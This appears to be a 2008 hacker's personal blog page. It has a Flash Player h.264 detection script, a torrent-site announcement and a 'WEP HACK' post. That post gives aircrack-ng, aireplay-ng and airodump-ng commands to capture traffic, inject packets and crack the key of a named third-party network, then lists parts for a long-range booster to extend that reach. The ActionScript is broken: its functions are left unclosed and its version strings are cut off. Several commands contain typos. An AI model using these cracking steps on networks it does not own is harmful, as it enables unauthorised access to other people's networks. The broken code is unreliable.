____  _ ____ ____ ______ ____  
|___ \| |___ \___ \____  |___ \ 
  __) | | __) |__) |  / /  __) |
 |__ <| ||__ <|__ <  / /  |__ < 
 ___) | |___) |__) |/ /   ___) |
|____/|_|____/____//_/   |____/ 

i pwn all thats all u need to know.

Wednesday, March 26, 2008

Flash player h.264 detection script

Does what it says on the label, Adobe has introduced h.264 codec inside Flash Player 9 Update 3 (v this script detects if you have below that version installed/or flsh player 10 in that case wont matter (i hope, haha).

//Flash player h.264 detection script//
//Flash Player 9 Update 3 (v

res.text += '///// h.264 detection script ///// \n\n';

fpv = System.capabilities.version.split(" ");
fpvArray = fpv[1].split(",");
fpvCurrent = Number(fpvArray[0]+"."+fpvArray[1]);
fpvBuild = Number(fpvArray[2]);

trace('flash player settings\n --- \nfpv full version = '+fpv+'\nfpv current = '+fpvCurrent+'\nfpv build = '+fpvBuild+' \n\n');
res.text += 'flash player settings\n --- \nfpv full version = '+fpv+'\nfpv current = '+fpvCurrent+'\nfpv build = '+fpvBuild+' \n\n';

function fpvXcheck(){
res.text += 'run detection\n --- \n';
trace('run detection\n---');
//fpvX version check?
fpvX = 10;
if (fpvCurrent>=fpvX) {
trace('flash player('+fpvX+') detected h.264 supported.');
res.text += 'flash player('+fpvX+') detected h.264 supported.';
} else {
trace('flash playerX not installed, run flash9 check?');
res.text += 'flash playerX not installed, run flash9 check?';

function checkCurrent() {
if (fpvCurrent == "9") {
trace('\nfpv current('+fpvCurrent+') = installed');
res.text += '\nfpv current('+fpvCurrent+') = installed';
} else {
trace('\nfpv current('+fpvCurrent+') = incorrect, please update flash player v( or higher. \n');
res.text += '\nfpv current('+fpvCurrent+') = incorrect, please update flash player v( or higher. \n';

function checkBuild() {
if (fpvBuild>=115) {
trace('\nfpv build('+fpvBuild+') = correct \n\n*successful! flash player supports h.264');
res.text += '\nfpv build('+fpvBuild+') = correct \n\n*successful! flash player supports h.264';
} else {
trace('\nfpv build('+fpvBuild+') = incorrect version, please update flash player v( or higher. \n\n*sorry! flash player doesnt support h.264');
res.text += '\nfpv build('+fpvBuild+') = incorrect version, please update flash player v( or higher. \n\n*sorry! flash player doesnt support h.264';


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Sunday, March 16, 2008

USSR Torrent - Seeders of the World Unite+

Just launched a torrent website called: USSR 'union of shared socialist resources, signup for FREE! to start downloading torents/uploading them (just ironing out a few bugs ATM email any errors to kurt@l4t3ncy.com) i have already added a few external torrents (linux distros/zombie films) but will be adding a load more of rare files soon.

tempary URl/address:


//over & out

WEP HACK - revised // wireless booster 5-KM's!!!!++++

WEP HACK (v0.2)

This is my newer version/exploration of WEP hacking/cracking this will allow the use of ‘aireplay-ng' to do brute force attack on the AP increasing the speed of cracking the WEP code/IVs sent, by injecting continuous packets directory into the AP, WPA-PSK Hack coming soon :)


-c = channel which target network is transmitting on
-w = dump file prefix
-i = save only captured IVs
*rausb0 = change to your wireless interface name (type 'iwconfig' in new shell to set to monitor mode to enable packet injection).

airodump-ng - c 11 -w wep -i raush0


-1 = fake authentication
0 = reassociation timing in secounds
-e = target network essid
-a = access point MAC address
-h = your cards MAC address

aireplay-ng -1 0 -e ULA_KK -a (their MAC) -h (my MAC) rausb0


-3 = standard arp request replay
-b = access point MAC address
-h = source MAC address (either an associated client or from fake authentication)

aireplay-ng -3 -b (their MAC) -h (my MAC)


-a = force attack mode
1 = static WEP
-0 = apply colors in aircrack
-n = specify the length of the key (128 104-bit WEP)

aircrack-ng -a 1 -0 -n 128 wep-01.ivs (chose target)


in the process of making a video/tutorial of how to crack/hack wireless signal.

been researching into building a 5KM wireless signal booster, here is what the built consists of so far:

2 Meter RP-SMA WiFi Extension Lead - HDF400 PRO Range (£19.95)
2x RP SMA Male to N-Type Male Adaptor WiFi WLAN (£2.50)
Senao NL-2511 CD PLUS EXT2 200mw 802.11b wireless card - MMCX to SMA pigtail (£24.15)
10 Meter RP-SMA WiFi Extension Lead - HDF400 PRO Range (£29.95)
1000mW / 1Watt WiFi Power Booster indoor/outdoor - N-Female (£149.95)
2.4 GHZ OMNI ANTENNA 22dBI - N-female (£50.00)

Going for a omni directional antenna for (to start off with first prolly only get about 2-3KM's boost) now but looking into putting a 2 way splitter on the booster and having a 30dbm direction motorised 360 digrea dish, for extra coverage, cant wait ;x

you can get everything from eBay for under £300's cant wait to get this baby up and running..


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